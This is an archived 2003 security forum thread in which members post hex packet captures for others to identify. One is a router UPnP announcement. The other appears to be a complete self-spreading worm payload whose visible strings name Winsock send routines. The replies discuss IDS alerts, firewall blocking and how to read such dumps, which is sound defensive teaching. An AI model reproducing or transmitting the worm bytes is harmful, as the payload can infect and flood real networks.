Name that attack Part 2 [Archive] - Screaming Electron Forums

soup4you2

April 8th, 2003, 13:01

Here's one i had to go onsite once to figure out..

[code:1:127959ef89]
length = 313

000 : 4E 4F 54 49 46 59 20 2A 20 48 54 54 50 2F 31 2E NOTIFY * HTTP/1.
010 : 31 0D 0A 48 4F 53 54 3A 32 33 39 2E 32 35 35 2E 1..HOST:239.255.
020 : 32 35 35 2E 32 35 30 3A 31 39 30 30 0D 0A 43 61 255.250:1900..Ca
030 : 63 68 65 2D 43 6F 6E 74 72 6F 6C 3A 6D 61 78 2D che-Control:max-
040 : 61 67 65 3D 31 32 30 0D 0A 4C 6F 63 61 74 69 6F age=120..Locatio
050 : 6E 3A 68 74 74 70 3A 2F 2F 31 39 32 2E 31 36 38 n:http://192.168
060 : 2E 31 2E 31 3A 35 36 37 38 2F 72 6F 6F 74 44 65 .1.1:5678/rootDe
070 : 73 63 2E 78 6D 6C 0D 0A 4E 54 3A 75 72 6E 3A 73 sc.xml..NT:urn:s
080 : 63 68 65 6D 61 73 2D 75 70 6E 70 2D 6F 72 67 3A chemas-upnp-org:
090 : 73 65 72 76 69 63 65 3A 57 41 4E 49 50 43 6F 6E service:WANIPCon
0a0 : 6E 65 63 74 69 6F 6E 3A 31 0D 0A 55 53 4E 3A 75 nection:1..USN:u
0b0 : 75 69 64 3A 75 70 6E 70 2D 57 41 4E 43 6F 6E 6E uid:upnp-WANConn
0c0 : 65 63 74 69 6F 6E 44 65 76 69 63 65 2D 31 5F 30 ectionDevice-1_0
0d0 : 2D 30 30 39 30 61 32 37 37 37 37 37 37 3A 3A 75 -0090a2777777::u
0e0 : 72 6E 3A 73 63 68 65 6D 61 73 2D 75 70 6E 70 2D rn:schemas-upnp-
0f0 : 6F 72 67 3A 73 65 72 76 69 63 65 3A 57 41 4E 49 org:service:WANI
100 : 50 43 6F 6E 6E 65 63 74 69 6F 6E 3A 31 0D 0A 4E PConnection:1..N
110 : 54 53 3A 73 73 64 70 3A 61 6C 69 76 65 0D 0A 53 TS:ssdp:alive..S
120 : 65 72 76 65 72 3A 4E 54 2F 35 2E 30 20 55 50 6E erver:NT/5.0 UPn
130 : 50 2F 31 2E 30 0D 0A 0D 0A P/1.0....
[/code:1:127959ef89]

bsdjunkie

April 8th, 2003, 14:11

Woot, someone h4x0r3d your linksys =)

http://www.dslreports.com/faq/5919

soup4you2

April 8th, 2003, 14:23

yep it was a lynksys that never had the firmware updated on it...

heh...

easily fixable

bsdjunkie

April 8th, 2003, 14:28

If you would like to post more like this please do so... In the future Ill hold off answering to give others a chance as well. Its not fair since I do this for a living... :wink:

soup4you2

April 8th, 2003, 15:10

ok here's another fun one... we all should be sick of seeing this

[code:1:94d5552d39]
length = 376

000 : 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
010 : 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
020 : 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
030 : 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
040 : 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
050 : 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
060 : 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p.
070 : 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h..
080 : B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5.
090 : 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3
0a0 : 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick
0b0 : 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d
0c0 : 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf
0d0 : B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E
0e0 : D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P
0f0 : BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt.
100 : BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP..
110 : 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P.
120 : 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E
130 : C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a
140 : D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........
150 : C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j..
160 : 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P
170 : 8B 45 AC 50 FF D6 EB CA .E.P....

[/code:1:94d5552d39]

bsdjunkie

April 8th, 2003, 15:19

another good one =) I get these hits on my IDS more than anything else recently...

10,059 hits since 03/30/03 till today. :roll:

soup4you2

April 8th, 2003, 15:33

i've gotten 11 since the 4th. now i've gotten lazy and set portsentry to listen on that port.. 1 packet and *poof* ipfw takes over

tarballed

April 8th, 2003, 16:08

Boy, do I have some major questions. :P

First, let's start with the actual data. I'm guessing that the data you posted in this thread is from a snort file of some sort? if not, what so?

Secondly, what is the best way to read a log file like that? I see all the hex on the left, and information on the right.
What is the best way to break this down and read it so you can determine what is going on?

Thirdly, Post some more! This is great for learning!

Tarballed